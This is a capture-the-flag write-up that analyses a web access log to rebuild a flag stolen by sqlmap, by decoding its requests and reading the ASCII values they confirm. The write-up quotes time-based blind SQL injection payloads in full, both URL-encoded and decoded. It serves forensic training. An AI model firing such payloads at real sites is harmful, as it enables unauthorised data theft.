Log challenge writeup

1. Since this is a log-analysis challenge, the first step is to open the log, access.log, and pull out a fragment:

id=1%27%20aNd%20%28SelECT%204235%20fRom%20%28SelECT%28sleEp%281-%28If%28ORd%28MId%28%28SelECT%20IfNULL%28CaST%28%60flag%60%20aS%20nChar%29%2C0x20%29%20fRom%20sqli.%60flag%60%20ORdER%20bY%20%60flag%60%20LimIT%200%2C1%29%2C22%2C1%29%29%3E32%2C0%2C1%29%29%29%29%29dfEI%29%20aNd%20%27hbou%27%3D%27hbou HTTP/1.1" 200 729 "-" "sqlmap/1.4.4.6#dev (http://sqlmap.org)" 49.74.204.67 - - [22/Apr/2020:09:39:22 +0000] "GET /?id=1%27%20aNd%20%28sELeCT%204235%20frOM%20%28sELeCT%28sLeeP%281-%28If%28ORd%28MiD%28%28sELeCT%20IfNULL%28CaSt%28%60flag%60%20As%20NChar%29%2C0x20%29%20frOM%20sqli.%60flag%60%20ORdER%20bY%20%60flag%60%20liMit%200%2C1%29%2C22%2C1%29%29%3E1%2C0%2C1%29%29%29%29%29dfEI%29%20aNd%20%27hbou%27%3D%27hbou HTTP/1.1" 200 729 "-" "sqlmap/1.4.4.6#dev (http://sqlmap.org)" 

Because the frequently occurring %27 and %20 are the URL encodings of a single quote and a space, the request looks URL-encoded. After decoding it with an online decoder, part of the content (truncated here because it is too long) reads:

0,1),21,1))!=125,0,1)))))dfEI) anD 'hbou'='hbou HTTP/1.1" 200 729 "-" "sqlmap/1.4.4.6#dev (http://sqlmap.org)"49.74.204.67 - - [22/Apr/2020:09:39:22 +0000] "GET /?id=1' AnD (sEleCt 4235 FRom (sEleCt(SLeep(1-(If(oRd(mID((sEleCt IfNULL(CAst(`flag` As NcHAr),0x20) FRom sqli.`flag` oRdER By `flag` lIMIt 0,1),22,1))>64,0,1)))))dfEI) AnD 'hbou'='hbou HTTP/1.1" 200 729 "-" "sqlmap/1.4.4.6#dev (http://sqlmap.org)"49.74.204.67 - - [22/Apr/2020:09:39:22 +0000] "GET /?id=1' aNd (SelECT 4235 fRom (SelECT(sleEp(1-(If(ORd(MId((SelECT IfNULL(CaST(`flag` aS nChar),0x20) fRom sqli.`flag` ORdER bY `flag` LimIT 0,1),22,1))>32,0,1)))))dfEI) aNd 'hbou'='hbou HTTP/1.1" 200 729 "-" "sqlmap/1.4.4.6#dev (http://sqlmap.org)"49.74.204.67 - - [22/Apr/2020:09:39:22 +0000] "GET /?id=1' aNd (sELeCT 4235 frOM (sELeCT(sLeeP(1-(If(ORd(MiD((sELeCT IfNULL(CaSt(`flag` As NChar),0x20) frOM sqli.`flag` ORdER bY `flag` liMit 0,1),22,1))>1,0,1)))))dfEI) aNd 'hbou'='hbou HTTP/1.1" 200 729 "-" "sqlmap/1.4.4.6#dev (http://sqlmap.org)"


2. Looking at the log again, a few keywords stand out: sqlmap, select, id, and so on. The target was clearly scanned with sqlmap, so this should be SQL injection. I tried accessing the site with id=1' ..... and various other statement combinations, but it could not be reached. Re-reading the challenge description, it is a log-analysis problem, so it should be testing offline analysis. So I went back to the log and found it very regular: a long stretch of requests reads the sqli.flag table cast to nchar and compares one character at a time against different ASCII codes, first narrowing the range with comparisons and then confirming with !=. I have extracted the key parts:

....
....flag` LImIt 0,1),1,1))!=102,0,1)))))....
....flag` lImiT 0,1),2,1))>96,0,1)))))d....
....
flag` LiMit 0,1),2,1))!=108,0,1)))))
`flag` limIt 0,1),3,1))>96,0,1)))))

Clearly the attacker had already guessed the first byte correctly and moved on to guessing the second. Looking the confirmed values up in the ASCII table gives:
102 => 'f'
108 => 'l'
Carrying this through the whole log eventually yields a result of the form flag{a sequence of letters}; submitting it gives the answer.
